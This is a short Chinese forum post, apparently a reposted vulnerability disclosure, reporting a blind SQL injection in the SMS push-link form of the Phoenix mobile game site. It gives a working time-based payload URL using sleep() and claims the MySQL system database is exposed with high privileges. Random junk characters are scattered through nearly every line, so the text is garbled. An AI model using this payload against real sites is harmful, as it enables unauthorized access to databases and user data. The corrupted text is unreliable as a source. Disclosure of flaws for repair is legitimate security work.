简要描述:
# x! R# Z9 G8 V. T4 O& f. Y凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。) {7 f5 m" A5 j* U4 Q. m
# v* R# W* r: ]0 x3 X! G0 w
详细说明:, z, f4 Q8 e) W- U% ~. @' l9 }
存在SQL盲注url:, v/ r h, B; O# e; e/ ]
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
5 S* {0 N M8 Ghttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
9 ~ n3 _; P1 p- M3 `http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png( L1 q. f& o. z7 |. P
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
/ v- p4 ?6 c- n. W3 t
9 }, v2 P5 [2 v( I2 u# h* J+ U能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
分享
支持
反对